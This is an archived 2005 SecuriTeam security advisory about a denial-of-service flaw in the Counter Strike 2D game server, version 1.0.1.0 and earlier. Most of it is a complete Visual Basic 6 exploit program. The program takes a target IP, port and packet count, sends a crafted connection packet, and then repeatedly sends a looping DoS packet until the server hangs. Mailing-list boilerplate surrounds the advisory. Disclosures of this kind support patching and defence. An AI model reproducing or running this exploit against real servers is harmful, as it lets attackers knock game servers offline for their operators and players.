[EXPL] Counter Strike 2D DoS (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 09/13/05
- Previous message: SecuriTeam: "[UNIX] PPPd DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 13 Sep 2005 17:06:15 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Counter Strike 2D DoS (Exploit)
------------------------------------------------------------------------
SUMMARY
" <http://www.cs2d.com/> Counter-Strike 2D is a 2D Clone of the most
famous Multiplayer Game ever: Counter-Strike by Valve Software." By
sending crafted packets will cause Counter Strike 2D to enter to a DoS
condition.
DETAILS
Vulnerable Systems:
* Counter Strike 2D Windows version 1.0.1.0 and prior
By repeating the same packet more then once, Counter Strike 2D will enter
a loop and will stop responding after several sending of the packets .
Exploit:
VERSION 5.00
Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX"
Begin VB.Form frmMain
BorderStyle = 4 'Festes Werkzeugfenster
Caption = "CS2D DoS - tHa_imaX"
ClientHeight = 2160
ClientLeft = 45
ClientTop = 315
ClientWidth = 3195
BeginProperty Font
Name = "Verdana"
Size = 8.25
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Icon = "frmMain.frx":0000
LinkTopic = "Form1"
MaxButton = 0 'False
MinButton = 0 'False
ScaleHeight = 2160
ScaleWidth = 3195
ShowInTaskbar = 0 'False
StartUpPosition = 3 'Windows-Standard
Begin VB.CommandButton cmdAttack
Caption = "[Attack]"
Height = 285
Left = 45
TabIndex = 9
Top = 1545
Width = 3090
End
Begin VB.Frame Frame1
Caption = "Attack Settings"
Height = 1560
Left = 45
TabIndex = 0
Top = -15
Width = 3105
Begin VB.TextBox txtName
Alignment = 2 'Zentriert
Appearance = 0 '2D
Height = 285
Left = 1305
TabIndex = 8
Text = "jack_lalane"
Top = 1230
Width = 1740
End
Begin VB.TextBox txtPC
Alignment = 2 'Zentriert
Appearance = 0 '2D
Height = 270
Left = 1305
TabIndex = 6
Text = "50"
Top = 810
Width = 1740
End
Begin VB.TextBox txtPort
Alignment = 2 'Zentriert
Appearance = 0 '2D
Height = 285
Left = 1305
TabIndex = 4
Text = "36963"
Top = 510
Width = 1740
End
Begin VB.TextBox txtIP
Alignment = 2 'Zentriert
Appearance = 0 '2D
Height = 285
Left = 1305
TabIndex = 2
Text = "127.0.0.1"
Top = 210
Width = 1740
End
Begin VB.Label Label4
Caption = "Player Name:"
Height = 210
Left = 60
TabIndex = 7
Top = 1260
Width = 1185
End
Begin VB.Label Label3
Caption = "Packet Count:"
Height = 210
Left = 60
TabIndex = 5
Top = 840
Width = 1245
End
Begin VB.Label Label2
Caption = "Server Port:"
Height = 210
Left = 60
TabIndex = 3
Top = 525
Width = 1065
End
Begin VB.Label Label1
Caption = "Server IP:"
Height = 210
Left = 60
TabIndex = 1
Top = 240
Width = 960
End
End
Begin MSWinsockLib.Winsock wS
Left = 2865
Top = -45
_ExtentX = 741
_ExtentY = 741
_Version = 393216
Protocol = 1
End
Begin VB.Label lblS
Caption = "DoS Loaded..."
Height = 255
Left = 45
TabIndex = 10
Top = 1905
Width = 3090
End
End
Attribute VB_Name = "frmMain"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'***WRITTEN BY tHa_imaX [tHa_imaX@yahoo.de]
'***23.08.2005
'***NEED A JOINT NOW ;)
Dim ConnectionPacket As String ' Declare our Connection String
Dim DoSPacket As String ' Declare our DoS Packet
Dim pC As Integer ' Packet Count
Private Sub cmdAttack_Click()
'First we define the Connect Packet
ConnectionPacket = Chr(Val("&hFA")) & Chr(Val("&hFA")) & _
Chr(Val("&h0D")) & Chr(Val("&h0A")) & _
"<name>" & _
Chr(Val("&hCE")) & Chr(Val("&h7B")) & Chr(Val("&hE2")) & _
Chr(Val("&h45")) & Chr(Val("&h63")) & Chr(Val("&h90")) & _
Chr(Val("&h00")) & Chr(Val("&h00"))
'At twice we define our DoS Packet
DoSPacket = Chr(Val("&hFA")) & Chr(Val("&h04")) & _
"<name>" & _
Chr(Val("&h0D")) & Chr(Val("&h0A")) & Chr(Val("&h02"))
'Now we prepare the packets (insert our playername)
ConnectionPacket = Replace(ConnectionPacket, "<name>", txtName.Text)
DoSPacket = Replace(DoSPacket, "<name>", txtName.Text)
'Set the pC to zero
pC = 0
'Lets send the First Packet to tell the server who we are
wS.RemoteHost = txtIP.Text
wS.RemotePort = Val(txtPort.Text)
wS.SendData ConnectionPacket
End Sub
Private Sub wS_DataArrival(ByVal bytesTotal As Long)
On Error Resume Next ' Ignore Errors
'Count the Packets to Cancel the attack after the packetcount value
pC = pC + 1
If pC >= Val(txtPC.Text) Then
lblS.Caption = "Done."
Exit Sub
End If
lblS = "Total Packets: " & pC
'Dim tmp As String
'wS.GetData tmp
'Debug.Print tmp
'Send the DoSPacket if the Server send something=>loop
wS.SendData DoSPacket
'Handle Errors
If Err <> 0 Then
MsgBox Err.Description
pC = Val(txtPC.Text)
End If
End Sub
'EoF
ADDITIONAL INFORMATION
The information has been provided by <mailto:the_imax@yahoo.de> X X.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] PPPd DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NT] Timbuktu Pro Path Traversal and Log Injection
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Several fields of the packet
... The other bug is a logging file content manipulation vulnerability ... chunk
should be set ... (Securiteam) - [NT] Painkiller DoS and Limited Code Execution
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... a limited code execution issue
on the server. ... An authorization string can be found at ... * The client's
packet used to join and containing its game ... (Securiteam) - [UNIX] PPPd DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Point-to-Point Protocol
for Unix systems". ... It reads in the packet at line 932, ... The loop continues
processing the packet as long as len is!= 0. ... (Securiteam) - [NT] Technical Description of the SSL PCT Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... thorough and detailed analysis
of the vulnerability in MS's SSL library is ... the variable N is taken from the packet
itself. ... In this context a "valid field value" is one that allows the execution ...
(Securiteam) - [EXPL] autoRST - Automated TCP RST Exploit
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... sniff for TCP packets on
a network and then sends out a forged RST packet ... * winpcap header files downloaded
and paths setup. ... typedef struct mac_address { ... (Securiteam)
